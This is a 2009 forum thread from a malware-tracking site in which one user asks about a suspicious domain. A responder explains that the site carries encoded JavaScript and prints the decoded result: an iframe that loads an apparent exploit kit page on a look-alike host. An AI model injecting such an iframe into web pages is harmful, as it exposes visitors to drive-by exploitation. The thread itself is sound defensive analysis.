Malware Domain List

Malware Related => Malware Analysis => Topic started by: quendi on August 04, 2009, 07:20:08 am

Title: hxxp://www.danceradioglobal.com/
Post by: quendi on August 04, 2009, 07:20:08 am
Hi!

Can anyone analyze what's happening with this domain hxxp://www.danceradioglobal.com/ ?

Thx a lot.

Note: an explained analysis could help me to ask less :) Thx again :)
Title: Re: hxxp://www.danceradioglobal.com/
Post by: MysteryFCM on August 04, 2009, 10:08:56 pm
It contains encoded JS that when decoded, shows it loading an exploit at the following;

Code: [Select]
<iframe src='http://www.googleledal.com/traff1/go.php?sid=1'></iframe>
Likely a PDF exploit, but sadly this is returning a 404 for me at present.
Title: Re: hxxp://www.danceradioglobal.com/
Post by: quendi on August 06, 2009, 11:51:04 pm
Thx a lot for the info :)
Title: Re: hxxp://www.danceradioglobal.com/
Post by: MysteryFCM on August 06, 2009, 11:58:39 pm
No problem :)